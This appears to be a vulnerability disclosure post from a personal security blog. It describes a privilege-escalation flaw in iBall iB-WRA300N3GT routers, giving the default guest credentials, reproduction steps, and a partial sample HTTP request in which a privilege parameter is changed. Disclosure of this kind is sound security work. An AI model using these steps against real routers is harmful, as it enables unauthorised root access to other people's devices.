Privilege Escalation on iBall iB-WRA300N3GT (Routers) devices allows remote authenticated users to obtain root privileges by leveraging a guest/user/normal account to submit a modified privilege parameter. Reproduction Steps: Step 1 : Logon to Router using Guest privileges. (Default : Username : guest , Password : guest) Step 2 : Goto Maintenance Tab Step 3 : Click on Password Tab (On Right Panel) Step 4 : Enter new user name and password for adding new guest user Step 5 : Intercept HTTP request Step 6 : A sample HTTP request will look like following one. ====================HTTP Request Sample======================= POST /form2userconfig.cgi HTTP/1.1 Referer: http://192.168.1.1/userconfig. htm?v=1499683514000 Cookie: SessionID= username=test&privilege=0&newp ass=hello&confpass=hello&addus er=Add&hiddenpass=&submit.htm% 3Fuserconfig.htm=Send ...
Hey There ! This is a personal blog of Yash Mehta. Contains public disclosures and proof of concepts of various security findings.